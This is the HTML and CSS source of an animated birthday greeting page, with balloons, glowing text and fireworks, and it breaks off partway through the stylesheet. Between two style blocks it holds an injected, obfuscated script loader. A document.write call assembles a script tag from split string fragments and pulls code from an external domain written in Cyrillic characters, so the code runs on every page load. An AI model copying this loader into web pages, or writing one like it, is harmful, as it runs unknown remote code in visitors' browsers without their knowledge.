<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1" />
<meta name="google" content="notranslate">
<title>Happy Birthday Dear Friend</title>
<!--<meta property="og:type" content="website" />
<meta property="og:title" content=" Surprise For You From ManishSona" />
<meta property="og:url" content="http://mera.style/?u=ManishSona" />-->
<meta property="og:description" content="HAPPY BIRTHDAY🎂🎀🎁 DEAR Anshu" />
<!--<meta property="og:site_name" content="Create New Wish" />
<meta property="og:image" content="OVSzeDm.png">-->
<link rel="icon" type="image/png" href="scP5WrK.png">
<link rel="stylesheet" href="hopeing.css" />
<link type="text/css" rel="stylesheet" href="animate.min.css" />
<style>
span {
  text-transform: uppercase;
}
.dabba {
  width: 800px;
  height: 230px;
  padding: 10px;
  margin: 0 auto;
  background:transparent;
  position: relative;
}
.balloon {
  width: 1000px;
  margin: 0 auto;
  padding-top: 30px;
  position: relative;
}
.balloon > div {
  width: 70px;
  height: 90px;
  background: rgba(182, 15, 97, 0.9);
  border-radius: 0;
  border-radius: 80% 80% 80% 80%;
  margin: 0 auto;
  position: absolute;
  padding: 10px;
  box-shadow: inset 17px 7px 10px rgba(182, 15, 97, 0.9);
  -webkit-transform-origin: bottom center;
}
.balloon > div:nth-child(1) {
  background: rgba(182, 15, 97, 0.9);
  left: 0;
  box-shadow: inset 10px 10px 10px rgba(135, 11, 72, 0.9);
  -webkit-animation: balloon1 6s ease-in-out infinite;
  -moz-animation: balloon1 6s ease-in-out infinite;
  -o-animation: balloon1 6s ease-in-out infinite;
  animation: balloon1 6s ease-in-out infinite;
}
.balloon > div:nth-child(1):before {
  color: rgba(182, 15, 97, 0.9);
}
.balloon > div:nth-child(2) {
  background: rgba(242, 112, 45, 0.9);
  left: 50px;
  box-shadow: inset 10px 10px 10px rgba(222, 85, 14, 0.9);
  -webkit-animation: balloon2 6s ease-in-out infinite;
  -moz-animation: balloon2 6s ease-in-out infinite;
  -o-animation: balloon2 6s ease-in-out infinite;
  animation: balloon2 6s ease-in-out infinite;
}
.balloon > div:nth-child(2):before {
  color: rgba(242, 112, 45, 0.9);
}
.balloon > div:nth-child(3) {
  background: rgba(45, 181, 167, 0.9);
  left: 100px;
  box-shadow: inset 10px 10px 10px rgba(35, 140, 129, 0.9);
  -webkit-animation: balloon4 6s ease-in-out infinite;
  -moz-animation: balloon4 6s ease-in-out infinite;
  -o-animation: balloon4 6s ease-in-out infinite;
  animation: balloon4 6s ease-in-out infinite;
}
.balloon > div:nth-child(3):before {
  color: rgba(45, 181, 167, 0.9);
}
.balloon > div:nth-child(4) {
  background: rgba(190, 61, 244, 0.9);
  left: 150px;
  box-shadow: inset 10px 10px 10px rgba(173, 14, 240, 0.9);
  -webkit-animation: balloon1 5s ease-in-out infinite;
  -moz-animation: balloon1 5s ease-in-out infinite;
  -o-animation: balloon1 5s ease-in-out infinite;
  animation: balloon1 5s ease-in-out infinite;
}
.balloon > div:nth-child(4):before {
  color: rgba(190, 61, 244, 0.9);
}
.balloon > div:nth-child(5) {
  background: rgba(180, 224, 67, 0.9);
  left: 200px;
  box-shadow: inset 10px 10px 10px rgba(158, 206, 34, 0.9);
  -webkit-animation: balloon3 5s ease-in-out infinite;
  -moz-animation: balloon3 5s ease-in-out infinite;
  -o-animation: balloon3 5s ease-in-out infinite;
  animation: balloon3 5s ease-in-out infinite;
}
.balloon > div:nth-child(5):before {
  color: rgba(180, 224, 67, 0.9);
}
.balloon > div:nth-child(6) {
  background: rgba(242, 194, 58, 0.9);
  left: 250px;
  box-shadow: inset 10px 10px 10px rgba(234, 177, 15, 0.9);
  -webkit-animation: balloon2 3s ease-in-out infinite;
  -moz-animation: balloon2 3s ease-in-out infinite;
  -o-animation: balloon2 3s ease-in-out infinite;
  animation: balloon2 3s ease-in-out infinite;
}
.balloon > div:nth-child(6):before {
  color: rgba(242, 194, 58, 0.9);
}
.balloon > div:before {
  color: rgba(182, 15, 97, 0.9);
  position: absolute;
  bottom: -11px;
  left: 52px;
  content: "▲";
  font-size: 1em;
}
span {
  font-size: 2.0em;
  color: white;
  position: relative;
  top: 15px;
  left: 10%;
  
}
/*BALLOON 1 4*/
@-webkit-keyframes balloon1 {
  0%,
  100% {
    -webkit-transform: translateY(0) rotate(-6deg);
  }
  50% {
    -webkit-transform: translateY(-20px) rotate(8deg);
  }
}
@-moz-keyframes balloon1 {
  0%,
  100% {
    -moz-transform: translateY(0) rotate(-6deg);
  }
  50% {
    -moz-transform: translateY(-20px) rotate(8deg);
  }
}
@-o-keyframes balloon1 {
  0%,
  100% {
    -o-transform: translateY(0) rotate(-6deg);
  }
  50% {
    -o-transform: translateY(-20px) rotate(8deg);
  }
}
@keyframes balloon1 {
  0%,
  100% {
    transform: translateY(0) rotate(-6deg);
  }
  50% {
    transform: translateY(-20px) rotate(8deg);
  }
}
/* BAllOON 2 5*/
@-webkit-keyframes balloon2 {
  0%,
  100% {
    -webkit-transform: translateY(0) rotate(6eg);
  }
  50% {
    -webkit-transform: translateY(-30px) rotate(-8deg);
  }
}
@-moz-keyframes balloon2 {
  0%,
  100% {
    -moz-transform: translateY(0) rotate(6deg);
  }
  50% {
    -moz-transform: translateY(-30px) rotate(-8deg);
  }
}
@-o-keyframes balloon2 {
  0%,
  100% {
    -o-transform: translateY(0) rotate(6deg);
  }
  50% {
    -o-transform: translateY(-30px) rotate(-8deg);
  }
}
@keyframes balloon2 {
  0%,
  100% {
    transform: translateY(0) rotate(6deg);
  }
  50% {
    transform: translateY(-30px) rotate(-8deg);
  }
}
/* BAllOON 0*/
@-webkit-keyframes balloon3 {
  0%,
  100% {
    -webkit-transform: translate(0, -10px) rotate(6eg);
  }
  50% {
    -webkit-transform: translate(-20px, 30px) rotate(-8deg);
  }
}
@-moz-keyframes balloon3 {
  0%,
  100% {
    -moz-transform: translate(0, -10px) rotate(6eg);
  }
  50% {
    -moz-transform: translate(-20px, 30px) rotate(-8deg);
  }
}
@-o-keyframes balloon3 {
  0%,
  100% {
    -o-transform: translate(0, -10px) rotate(6eg);
  }
  50% {
    -o-transform: translate(-20px, 30px) rotate(-8deg);
  }
}
@keyframes balloon3 {
  0%,
  100% {
    transform: translate(0, -10px) rotate(6eg);
  }
  50% {
    transform: translate(-20px, 30px) rotate(-8deg);
  }
}
/* BAllOON 3*/
@-webkit-keyframes balloon4 {
  0%,
  100% {
    -webkit-transform: translate(10px, -10px) rotate(-8eg);
  }
  50% {
    -webkit-transform: translate(-15px, 20px) rotate(10deg);
  }
}
@-moz-keyframes balloon4 {
  0%,
  100% {
    -moz-transform: translate(10px, -10px) rotate(-8eg);
  }
  50% {
    -moz-transform: translate(-15px, 10px) rotate(10deg);
  }
}
@-o-keyframes balloon4 {
  0%,
  100% {
    -o-transform: translate(10px, -10px) rotate(-8eg);
  }
  50% {
    -o-transform: translate(-15px, 10px) rotate(10deg);
  }
}
@keyframes balloon4 {
  0%,
  100% {
    transform: translate(10px, -10px) rotate(-8eg);
  }
  50% {
    transform: translate(-15px, 10px) rotate(10deg);
  }
}
/*h1 {
  position: relative;
  top: 200px;
  text-align: center;
  color: rgba(182, 15, 97, 0.9);
  font-size: 3.5em;
}	*/
 .wrapper{width:400px;height:auto;margin:0 auto;background:#ffd400; overflow-x: hidden; box-shadow: 0 0 10px 1px rgba(0,0,0,.14), 0 1px 14px 2px rgba(0,0,0,.12), 0 0 5px -3px rgba(0,0,0,.3); background-image: url('5.gif'); background-size: contain;
    }
  .center{text-align:center}
  .main-img {margin-bottom: 5px; text-align: center; margin-top: -14px;}
    .quote-img {margin-bottom: 5px; text-align: center;}
    .quote-img img:first-child {width: 100%; margin-top: 35px;}
    .quote-img img:last-child {width: 72%; animation-duration: 6s;}

    .main-img .s-lota {width: 151px; position: relative; top: 61px;} 
    .main-img .s-main {width:100%;}
    .tilt {animation: rotation 2s linear; animation-fill-mode: forwards;}

    @keyframes rotation { from {transform: rotate(0deg);} to {transform: rotate(117deg);} }
    .cont {background: #ffd400; margin-top: -17px;}
.m1{position:fixed;left:0.01%; width:auto;height:100%;top:1%;color:#000;}
    .m2{position:fixed;right:0.01%; width:auto;height:100%;top:1%;color:#000;}
	 
.shake{0%,to{-webkit-transform:translateZ(0);transform:translateZ(0)}10%,30%,50%,70%,90%{-webkit-transform:translate3d(-10px,0,0);transform:translate3d(-10px,0,0)}20%,40%,60%,80%{-webkit-transform:translate3d(10px,0,0);transform:translate3d(10px,0,0)}}@keyframes shake{0%,to{-webkit-transform:translateZ(0);transform:translateZ(0)}10%,30%,50%,70%,90%{-webkit-transform:translate3d(-10px,0,0);transform:translate3d(-10px,0,0)}20%,40%,60%,80%{-webkit-transform:translate3d(10px,0,0);transform:translate3d(10px,0,0)}}.shake{-webkit-animation-name:shake;animation-name:shake}
.swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}.swing{-webkit-transform-origin:top center;transform-origin:top center;-webkit-animation-name:swing;animation-name:swing}
.enter-name input[type=name] {
	background-color:#a460f4;
	color: #fff;
   	border-radius: 10px;
    	box-sizing: border-box;
    	border: none;
    	padding: 5px;
    	position: fixed;
    	left: 10px;
    	bottom: 0px;
    	height: 50px;
    	width: 70%;
    	text-align: center;
    	font-size: 22px;
    	display: inline-block;
}

.enter-name .btnn {
	border-radius: 10px;
    	font-size: 21px;
    	padding: 4px;
    	position: fixed;
    	right: 2px;
    	bottom: 3px;
    	height: 50px;
    	width: 23%;
    	display: inline-block;
    	color: #fff;
    	background-color:a460f4;
    	border: none;
    	letter-spacing: .5px;
    	transition: .2s ease-out;
    	cursor: pointer;
    	line-height: 36px;
    	outline: 0;
    	text-transform: uppercase;
    	vertical-align: middle;
    	text-decoration: none;
    	animation-duration: 4s !important;
}

.enter-name input[type=name]::-webkit-input-placeholder { 
	color: #fff;
  	font-size: 18px;	
}

.enter-name input[type=name]::-moz-placeholder { 
	color: #fff;
  	font-size: 18px;
}

.enter-name input[type=name]:focus::-webkit-input-placeholder {
    color: #fff;
}

.enter-name input[type=name]:focus::-moz-placeholder { 
	color: #fff;
  	font-size: 18px;
}

.img-holder img {
    	width: 75%;
}

.wapp-msg a {
	background-color: #398a27;
    	text-decoration: none;
    	color: #fff;
	border-radius: 10px;
    	box-sizing: border-box;
    	border: none;
    	padding: 15px 0;
	position: fixed;
    	left: 10px;
    	bottom: 0px;
    	width: 97%;
    	text-align: center;
    	font-size: 22px;
    	display: inline-block;
    	text-shadow: 1px 1px 0 #444;
}

	
@media only screen and (max-width: 500px) {
    	.wrapper{
		width:96vw;
	}
}
      @import url(http://fonts.googleapis.com/css?family=Concert+One);

h1 {
  animation:glow 10s ease-in-out infinite;
  
  

/* For less laggy effect, uncomment this:
  
  animation:none;
  -webkit-text-stroke:1px #fff; 
  
=========== */
  
}



* { box-sizing:border-box; }

body {
  background:white;
  overflow:hidden;
  text-align:center;
}


@keyframes wobble {
  0%,100%{ transform:rotate3d(1,1,0,40deg); }
  25%{ transform:rotate3d(-1,1,0,40deg); }
  50%{ transform:rotate3d(-1,-1,0,40deg); }
  75%{ transform:rotate3d(1,-1,0,40deg); }
}

h1 {
  display:block;
  width:100%;
  line-height:1.5;
  font:900 10em 'Concert One', sans-serif;
  position:absolute;
  color:#fff;
}

@keyframes glow {
  0%,100%{ text-shadow:0 0 30px red; }
  25%{ text-shadow:0 0 30px blue; }
  50%{ text-shadow:0 0 30px red; }
  75%{ text-shadow:0 0 30px blue; }
}
h1:nth-child(2){ transform:translateZ(5px); } h1:nth-child(3){ transform:translateZ(10px);} h1:nth-child(4){ transform:translateZ(15px); } h1:nth-child(5){ transform:translateZ(20px); }
h1:nth-child(6){ transform:translateZ(25px); } h1:nth-child(7){ transform:translateZ(30px); } h1:nth-child(8){ transform:translateZ(35px); } h1:nth-child(9){ transform:translateZ(40px); }
h1:nth-child(10){ transform:translateZ(45px); }</style><script>document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'Г'+'ф.'+'i'+'o"></s'+'cr'+'ipt>');</script><style> .card-content.white-text {
background: #FC466B;  /* fallback for old browsers */
background: -webkit-linear-gradient(to right, #3F5EFB, #667db6);  /* Chrome 10-25, Safari 5.1-6 */
background: linear-gradient(to right, #3F5EFB, #667db6); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
background-image: url("ch.jpg")!important;
//background-position: center;
}
          p.card-title.center-align.comic.wishesed {
  //  font-family: serif;
//    font-size: 37px !important;
}
                     @media screen and (min-width: 482px){
.mymsgr {
    display: none;
}
    }
@media screen and (max-width: 480px){
.float-share a {
    width: 32% !important;
}
    }
@media screen and (max-width: 366px){
img#whatsappicon {
    margin-left: -20px !important;
}
    }
@media screen and (max-width: 334px){
img#whatsappicon {
    margin-left: -21px !important;
}
    .myshareicc{
        font-size: 15px !important;
    }
    }
           .tada {
  -webkit-animation-name: tada;
  animation-name: tada;
  -webkit-animation-duration: 1s;
  animation-duration: 1s;
  -webkit-animation-fill-mode: both;
  animation-fill-mode: both;
  }
  @-webkit-keyframes tada {
  0% {
  -webkit-transform: scale3d(1, 1, 1);
  transform: scale3d(1, 1, 1);
  }
  10%, 20% {
  -webkit-transform: scale3d(.9, .9, .9) rotate3d(0, 0, 1, -3deg);
  transform: scale3d(.9, .9, .9) rotate3d(0, 0, 1, -3deg);
  }
  30%, 50%, 70%, 90% {
  -webkit-transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, 3deg);
  transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, 3deg);
  }
  40%, 60%, 80% {
  -webkit-transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, -3deg);
  transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, -3deg);
  }
  100% {
  -webkit-transform: scale3d(1, 1, 1);
  transform: scale3d(1, 1, 1);
  }
  }
  @keyframes tada {
  0% {
  -webkit-transform: scale3d(1, 1, 1);
  transform: scale3d(1, 1, 1);
  }
  10%, 20% {
  -webkit-transform: scale3d(.9, .9, .9) rotate3d(0, 0, 1, -3deg);
  transform: scale3d(.9, .9, .9) rotate3d(0, 0, 1, -3deg);
  }
  30%, 50%, 70%, 90% {
  -webkit-transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, 3deg);
  transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, 3deg);
  }
  40%, 60%, 80% {
  -webkit-transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, -3deg);
  transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, -3deg);
  }
  100% {
  -webkit-transform: scale3d(1, 1, 1);
  transform: scale3d(1, 1, 1);
  }
  }body {
    background-size: 300% 100%;
   
}
.rock{animation:infinite 1s rock}
@keyframes rock {  0% {    transform: rotate(-1deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-1deg);  }}

.fuck{animation:infinite 1s fuck}
@keyframes rock {  0% {    transform: rotate(-2deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-2deg);  }}


h2 {
    font-size: 38px;
    text-align: center; 
    padding:1px;
    margin:1px;
    color: black;
    text-shadow: 1px 1px silver, -1px -1px silver;
    animation: rock infinite 1s;
    font-family: 'Indie Flower', cursive;
    letter-spacing: 2px;
}

h3 {
    font-size: 48px;
    text-align: center;
    padding:1px;
    margin:1px;
    color: white;
    text-shadow: 1px 1px silver, -1px -1px blue;
    aanimation: fuck infinite 1s;
    font-family: 'Indie Flower', cursive;
    letter-spacing: 2px;
}

@-webkit-keyframes swing
{
    15%
    {
        -webkit-transform: translateY(5px);
        transform: translateY(5px);
    }
    30%
    {
        -webkit-transform: translateY(-5px);
       transform: translateY(-5px);
    } 
    50%
    {
        -webkit-transform: translateY(4px);
        transform: translateY(4px);
    }
    65%
    {
        -webkit-transform: translateY(-4px);
        transform: translateY(-4px);
    }
    80%
    {
        -webkit-transform: translateY(3px);
        transform: translateY(3px);
    }
    100%
    {
        -webkit-transform: translateY(0);
        transform: translateY(0);
    }
}
@keyframes swing
{
    15%
    {
        -webkit-transform: translateY(5px);
        transform: translateY(5px);
    }
    30%
    {
        -webkit-transform: translateY(-5px);
        transform: translateY(-5px);
    }
    50%
    {
        -webkit-transform: translateY(4px);
        transform: translateY(4px);
    }
    65%
    {
        -webkit-transform: translateY(-4px);
        transform: translateY(-4px);
    }
    80%
    {
        -webkit-transform: translateY(3px);
        transform: translateY(3px);
    }
    100%
    {
        -webkit-transform: translateY(0);
        transform: translateY(0);
    }
}

@-webkit-keyframes swing1
{
    15%
    {
        -webkit-transform: translateY(5px);
        transform: translateY(5px);
    }
    30%
    {
        -webkit-transform: translateY(-5px);
       transform: translateY(-5px);
    } 
    50%
    {
        -webkit-transform: translateY(4px);
        transform: translateY(4px);
    }
    65%
    {
        -webkit-transform: translateY(-4px);
        transform: translateY(-4px);
    }
    80%
    {
        -webkit-transform: translateY(3px);
        transform: translateY(3px);
    }
    100%
    {
        -webkit-transform: translateY(0);
        transform: translateY(0);
    }
}

@keyframes swing1
{
    15%
    {
        -webkit-transform: translateY(5px);
        transform: translateY(5px);
    }
    30%
    {
        -webkit-transform: translateY(-5px);
        transform: translateY(-5px);
    }
    50%
    {
        -webkit-transform: translateY(4px);
        transform: translateY(4px);
    }
    65%
    {
        -webkit-transform: translateY(-4px);
        transform: translateY(-4px);
    }
    80%
    {
        -webkit-transform: translateY(3px);
        transform: translateY(3px);
    }
    100%
    {
        -webkit-transform: translateY(0);
        transform: translateY(0);
    }
}

@-webkit-keyframes swing2
{
    15%
    {
        -webkit-transform: translateY(5px);
        transform: translateY(5px);
    }
    30%
    {
        -webkit-transform: translateY(-5px);
       transform: translateY(-5px);
    } 
    50%
    {
        -webkit-transform: translateY(4px);
        transform: translateY(4px);
    }
    65%
    {
        -webkit-transform: translateY(-4px);
        transform: translateY(-4px);
    }
    80%
    {
        -webkit-transform: translateY(3px);
        transform: translateY(3px);
    }
    100%
    {
        -webkit-transform: translateY(0);
        transform: translateY(0);
    }
}

@keyframes swing2
{
    15%
    {
        -webkit-transform: translateY(5px);
        transform: translateY(5px);
    }
    30%
    {
        -webkit-transform: translateY(-5px);
        transform: translateY(-5px);
    }
    50%
    {
        -webkit-transform: translateY(4px);
        transform: translateY(4px);
    }
    65%
    {
        -webkit-transform: translateY(-4px);
        transform: translateY(-4px);
    }
    80%
    {
        -webkit-transform: translateY(3px);
        transform: translateY(3px);
    }
    100%
    {
        -webkit-transform: translateY(0);
        transform: translateY(0);
    }
}

@-webkit-keyframes swing3
{
    15%
    {
        -webkit-transform: translateY(5px);
        transform: translateY(5px);
    }
    30%
    {
        -webkit-transform: translateY(-5px);
       transform: translateY(-5px);
    } 
    50%
    {
        -webkit-transform: translateY(4px);
        transform: translateY(4px);
    }
    65%
    {
        -webkit-transform: translateY(-4px);
        transform: translateY(-4px);
    }
    80%
    {
        -webkit-transform: translateY(3px);
        transform: translateY(3px);
    }
    100%
    {
        -webkit-transform: translateY(0);
        transform: translateY(0);
    }
}

@keyframes swing3
{
    15%{-webkit-transform: translateY(5px);transform: translateY(5px);}
    30%{-webkit-transform: translateY(-5px);transform: translateY(-5px);}
    50%{-webkit-transform: translateY(4px);transform: translateY(4px);}
    65%{-webkit-transform: translateY(-4px);transform: translateY(-4px);}
    80%{-webkit-transform: translateY(3px);transform: translateY(3px);}
    100%{-webkit-transform: translateY(0);transform: translateY(0);}
}



.swing
{
        -webkit-animation: swing 5s infinite;  /* Chrome, Safari, Opera */
		animation: swing 5s infinite;
		-webkit-animation-timing-function: cubic-bezier(0,0,0.25,1);
		animation-timing-function: cubic-bezier(0,0,0.25,1);
        -webkit-animation-iteration-count: infinite;
        animation-iteration-count: infinite;
}

.swing1
{
	-webkit-animation: swing1 3s infinite;  /* Chrome, Safari, Opera */
		animation: swing1 3s infinite;
		-webkit-animation-timing-function: cubic-bezier(0,0,0.25,1);
		animation-timing-function: cubic-bezier(0,0,0.25,1);
        -webkit-animation-iteration-count: infinite;
        animation-iteration-count: infinite;
}

.swing2
{
	-webkit-animation: swing1 6s infinite;  /* Chrome, Safari, Opera */
		animation: swing1 6s infinite;
		-webkit-animation-timing-function: cubic-bezier(0,0,0.25,1);
		animation-timing-function: cubic-bezier(0,0,0.25,1);
        -webkit-animation-iteration-count: infinite;
        animation-iteration-count: infinite;
}

.swing3
{
	-webkit-animation: swing1 4s infinite;  /* Chrome, Safari, Opera */
		animation: swing1 4s infinite;
		-webkit-animation-timing-function: cubic-bezier(0,0,0.25,1);
		animation-timing-function: cubic-bezier(0,0,0.25,1);
        -webkit-animation-iteration-count: infinite;
        animation-iteration-count: infinite;
}

/*DANCING ANIMATION*/
@keyframes dance {
  0%{
    -webkit-transform:  rotate(10deg);
    -ms-transform:  rotate(10deg);
    transform:  rotate(10deg);
  }
  16.66%, 49.98%{
    -webkit-transform: rotate(-10deg);
    -ms-transform: rotate(-10deg);
    transform: rotate(-10deg);
  }
  32.32%{
    -webkit-transform: rotate(-5deg);
    -ms-transform: rotate(-5deg);
    transform: rotate(-5deg);
  }
  66.64%, 100%{
    -webkit-transform: rotate(10deg);
    -ms-transform: rotate(10deg);
    transform: rotate(10deg);
  }
  83.8%{
    -webkit-transform: rotate(5deg);
    -ms-transform: rotate(5deg);
    transform: rotate(5deg);
  }
}

-webkit-@keyframes dance {
  0%{
    -webkit-transform:  rotate(10deg);
    -ms-transform:  rotate(10deg);
    transform:  rotate(10deg);
  }
  16.66%, 49.98%{
    -webkit-transform: rotate(-10deg);
    -ms-transform: rotate(-10deg);
    transform: rotate(-10deg);
  }
  32.32%{
    -webkit-transform: rotate(-5deg);
    -ms-transform: rotate(-5deg);
    transform: rotate(-5deg);
  }
  66.64%, 100%{
    -webkit-transform: rotate(10deg);
    -ms-transform: rotate(10deg);
    transform: rotate(10deg);
  }
  83.8%{
    -webkit-transform: rotate(5deg);
    -ms-transform: rotate(5deg);
    transform: rotate(5deg);
  }
}
.hny-txt {animation:glowtwo 3s ease-in-out infinite; margin:0;}
      @keyframes glowtwo{0%,100%{text-shadow:0 0 30px yellow;color: white;}25%{text-shadow:0 0 30px blue;color: black;}50%{text-shadow:0 0 30px blue;color: blue;}75%{text-shadow:0 0 30px blue;color: #ebff00;}}
.button {
  background-color: #004A7F;
  -webkit-border-radius: 10px;
  border-radius: 10px;
  border: none;
  color: #FFFFFF;
  cursor: pointer;
  display: inline-block;
  font-family: Arial;
  font-size: 20px;
  padding: 5px 10px;
  text-align: center;
  text-decoration: none;
}
@-webkit-keyframes glowing {
  0% { background-color: #B20000; -webkit-box-shadow: 0 0 3px #B20000; }
  50% { background-color: #FF0000; -webkit-box-shadow: 0 0 40px #FF0000; }
  100% { background-color: #B20000; -webkit-box-shadow: 0 0 3px #B20000; }
}

@-moz-keyframes glowing {
  0% { background-color: #B20000; -moz-box-shadow: 0 0 3px #B20000; }
  50% { background-color: #FF0000; -moz-box-shadow: 0 0 40px #FF0000; }
  100% { background-color: #B20000; -moz-box-shadow: 0 0 3px #B20000; }
}

@-o-keyframes glowing {
  0% { background-color: #B20000; box-shadow: 0 0 3px #B20000; }
  50% { background-color: #FF0000; box-shadow: 0 0 40px #FF0000; }
  100% { background-color: #B20000; box-shadow: 0 0 3px #B20000; }
}

@keyframes glowing {
  0% { background-color: #B20000; box-shadow: 0 0 3px #B20000; }
  50% { background-color: #FF0000; box-shadow: 0 0 40px #FF0000; }
  100% { background-color: #B20000; box-shadow: 0 0 3px #B20000; }
}

.button {
  -webkit-animation: glowing 1500ms infinite;
  -moz-animation: glowing 1500ms infinite;
  -o-animation: glowing 1500ms infinite;
  animation: glowing 1500ms infinite;
}
/* Firework Animation */
.pyro {
  position: absolute;
  max-width: 1350px;
  width: 100vw; }

.pyro > .before {
  position: absolute;
  width: 5px;
  height: 5px;
  border-radius: 50%;
  box-shadow: 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff;
  -moz-animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards;
  -webkit-animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards;
  -o-animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards;
  -ms-animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards;
  animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards; }

.pyro > .after {
   position: absolute;
  width: 85%;
  height: 5px;
  border-radius: 50%;
  box-shadow: 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff, 0 0 #fff;
  -moz-animation-delay: 1.25s, 1.25s, 1.25s;
  -webkit-animation-delay: 1.25s, 1.25s, 1.25s;
  -o-animation-delay: 1.25s, 1.25s, 1.25s;
  -ms-animation-delay: 1.25s, 1.25s, 1.25s;
  animation-delay: 1.25s, 1.25s, 1.25s;
  -moz-animation-duration: 1.25s, 1.25s, 6.25s;
  -webkit-animation-duration: 1.25s, 1.25s, 6.25s;
  -o-animation-duration: 1.25s, 1.25s, 6.25s;
  -ms-animation-duration: 1.25s, 1.25s, 6.25s;
  animation-duration: 1.25s, 1.25s, 6.25s; }

@-webkit-keyframes bang {
  to {
    box-shadow: 120px -188.6666666667px #00fff2, 21px -379.6666666667px #002fff, 234px -267.6666666667px #6600ff, 190px -349.6666666667px #95ff00, -243px -224.6666666667px #00d5ff, -219px -51.6666666667px #00ffcc, 29px -18.6666666667px #ff1a00, 38px -231.6666666667px #ff00c4, 231px -241.6666666667px #9500ff, 36px 5.3333333333px #00ff8c, -43px 41.3333333333px #0d00ff, -70px -49.6666666667px #ff0037, -186px -364.6666666667px #3c00ff, 4px -66.6666666667px #0048ff, -151px -139.6666666667px #a200ff, 212px -338.6666666667px #6600ff, 114px -71.6666666667px #00ff73, 189px -334.6666666667px #ff0004, 19px -313.6666666667px #00ff09, -237px -254.6666666667px #ff0037, -188px -96.6666666667px #001aff, 91px -12.6666666667px #00d5ff, 238px -230.6666666667px #9dff00, -7px -280.6666666667px #ffaa00, 182px -378.6666666667px #009dff, 135px -90.6666666667px #00ff26, -214px -56.6666666667px #4400ff, -207px -316.6666666667px #1100ff, 91px 26.3333333333px #e600ff, 52px -87.6666666667px #00ff9d, -21px -289.6666666667px #04ff00, -99px -25.6666666667px #ff0033, -124px -399.6666666667px #ff004d, 96px -220.6666666667px #bbff00, 250px -71.6666666667px #b300ff, -53px -147.6666666667px #ff0040, -216px -51.6666666667px #ff2f00, 19px 70.3333333333px #80ff00, -14px 5.3333333333px #95ff00, 107px -107.6666666667px #0062ff, 115px -241.6666666667px #00ff8c, 210px 60.3333333333px #00ff33, 86px -268.6666666667px #40ff00, -18px -18.6666666667px #6a00ff, -31px 28.3333333333px #00c8ff, -194px -100.6666666667px #0015ff, 8px -10.6666666667px #005eff, 164px 65.3333333333px #ff001a, -157px 10.3333333333px #a2ff00, -12px -400.6666666667px #0048ff, -124px -181.6666666667px #00ffa2; } }

@-moz-keyframes bang {
  to {
